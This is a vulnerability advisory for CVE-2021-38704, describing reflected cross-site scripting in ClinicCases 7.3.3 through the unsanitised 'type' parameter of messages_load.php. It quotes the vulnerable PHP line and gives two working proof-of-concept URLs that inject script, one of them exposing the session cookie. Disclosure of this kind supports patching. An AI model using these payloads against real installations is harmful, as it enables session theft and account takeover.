CVE-2021-38704
ClinicCases 7.3.3 Reflected Cross-Site Scripting (XSS)
Multiple reflected cross-site scripting (XSS) vulnerabilities in ClinicCases 7.3.3 allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft.
Detail
The HTTP GET parameter type is unsanitised and reflected in messages_load.php line 182.
echo "<div class='alert alert-danger' role='alert'>There are no messages in your $type folder</div>";The following payload can be used to trigger a cross-site scripting attack when clicked by an authenticated user:
http://cliniccases.local/cliniccases/lib/php/data/messages_load.php?type=<script>alert(document.domain)</script>As the PHPSESSID session cookie is insufficiently protected, it can be stolen by malicious JavaScript. This can be used for account takeover and session riding attacks.
http://cliniccases.local/cliniccases/lib/php/data/messages_load.php?type=<script>alert(document.cookie)</script>
